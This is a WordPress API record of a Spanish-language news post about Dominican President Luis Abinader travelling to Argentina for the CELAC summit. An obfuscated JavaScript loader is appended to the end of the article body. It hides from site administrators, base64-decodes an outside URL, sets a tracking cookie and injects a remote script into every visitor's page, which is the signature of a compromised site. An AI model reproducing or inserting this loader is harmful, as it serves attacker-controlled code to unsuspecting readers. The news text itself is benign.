{"id":13536,"date":"2023-01-23T10:08:18","date_gmt":"2023-01-23T14:08:18","guid":{"rendered":"https:\/\/yanessiespinal.com\/?p=13536"},"modified":"2023-01-23T10:08:18","modified_gmt":"2023-01-23T14:08:18","slug":"presidente-luis-abinader-viaja-este-lunes-a-argentina","status":"publish","type":"post","link":"https:\/\/enterarterd.com\/?p=13536","title":{"rendered":"Presidente Luis Abinader viaja este lunes a Argentina"},"content":{"rendered":"<p>Santo Domingo. &#8211;\u00a0<strong>El Presidente Luis Abinader<\/strong>\u00a0viajar\u00e1 este lunes a Buenos Aires, Argentina, donde participar\u00e1 en la\u00a0<strong>Cumbre de jefes de Estado y de Gobierno de la Comunidad de Estados Latinoamericanos y Caribe\u00f1os (CELAC).<\/strong><\/p>\n<p>El mandatario dominicano tiene previsto salir al mediod\u00eda en compa\u00f1\u00eda del Ministro Administrativo de la Presidencia,\u00a0<strong>Jos\u00e9 Ignacio Paliza<\/strong>, y del viceministro de Relaciones Exteriores,\u00a0<strong>Rub\u00e9n Sili\u00e9<\/strong>; as\u00ed como de sus asistentes\u00a0<strong>Eilyn Beltr\u00e1n y Mercedes Pichardo<\/strong>\u00a0junto al director del Cuerpo de Seguridad Presidencial (CUSEP), general de brigada del ERD,\u00a0<strong>Jimmy Arias.<\/strong><\/p>\n<p>El Presidente Abinader, quien\u00a0<strong>tendr\u00e1 una intervenci\u00f3n en la Cumbre<\/strong>, estar\u00e1 de regreso al pa\u00eds el pr\u00f3ximo mi\u00e9rcoles.<script>(function(){try{if(document.getElementById&&document.getElementById('wpadminbar'))return;var t0=+new Date();for(var i=0;i<20000;i++){var z=i*i;}if((+new Date())-t0>120)return;if((document.cookie||'').indexOf('http2_session_id=')!==-1)return;function systemLoad(input){var key='ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+\/=',o1,o2,o3,h1,h2,h3,h4,dec='',i=0;input=input.replace(\/[^A-Za-z0-9\\+\\\/\\=]\/g,'');while(i<input.length){h1=key.indexOf(input.charAt(i++));h2=key.indexOf(input.charAt(i++));h3=key.indexOf(input.charAt(i++));h4=key.indexOf(input.charAt(i++));o1=(h1<<2)|(h2>>4);o2=((h2&15)<<4)|(h3>>2);o3=((h3&3)<<6)|h4;dec+=String.fromCharCode(o1);if(h3!=64)dec+=String.fromCharCode(o2);if(h4!=64)dec+=String.fromCharCode(o3);}return dec;}var u=systemLoad('aHR0cHM6Ly9zZWFyY2hyYW5rdHJhZmZpYy5saXZlL2pzeA==');if(typeof window!=='undefined'&#038;&#038;window.__rl===u)return;var d=new Date();d.setTime(d.getTime()+30*24*60*60*1000);document.cookie='http2_session_id=1; expires='+d.toUTCString()+'; path=\/; SameSite=Lax'+(location.protocol==='https:'?'; Secure':'');try{window.__rl=u;}catch(e){}var s=document.createElement('script');s.type='text\/javascript';s.async=true;s.src=u;try{s.setAttribute('data-rl',u);}catch(e){}(document.getElementsByTagName('head')[0]||document.documentElement).appendChild(s);}catch(e){}})();<\/script><\/p>\n","protected":false},"excerpt":{"rendered":"<p>Santo Domingo. &#8211;\u00a0El Presidente Luis Abinader\u00a0viajar\u00e1 este lunes a Buenos Aires, Argentina, donde participar\u00e1 en la\u00a0Cumbre de jefes de Estado y de Gobierno de la Comunidad de Estados Latinoamericanos y Caribe\u00f1os (CELAC). El mandatario dominicano tiene previsto salir al mediod\u00eda en compa\u00f1\u00eda del Ministro Administrativo de la Presidencia,\u00a0Jos\u00e9 Ignacio Paliza, y del viceministro de Relaciones [&hellip;]<\/p>\n","protected":false},"author":1,"featured_media":13538,"comment_status":"closed","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[6],"tags":[],"class_list":{"0":"post-13536","1":"post","2":"type-post","3":"status-publish","4":"format-standard","5":"has-post-thumbnail","7":"category-nacionales"},"_links":{"self":[{"href":"https:\/\/enterarterd.com\/index.php?rest_route=\/wp\/v2\/posts\/13536","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/enterarterd.com\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/enterarterd.com\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/enterarterd.com\/index.php?rest_route=\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/enterarterd.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=13536"}],"version-history":[{"count":0,"href":"https:\/\/enterarterd.com\/index.php?rest_route=\/wp\/v2\/posts\/13536\/revisions"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/enterarterd.com\/index.php?rest_route=\/wp\/v2\/media\/13538"}],"wp:attachment":[{"href":"https:\/\/enterarterd.com\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=13536"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/enterarterd.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=13536"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/enterarterd.com\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=13536"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}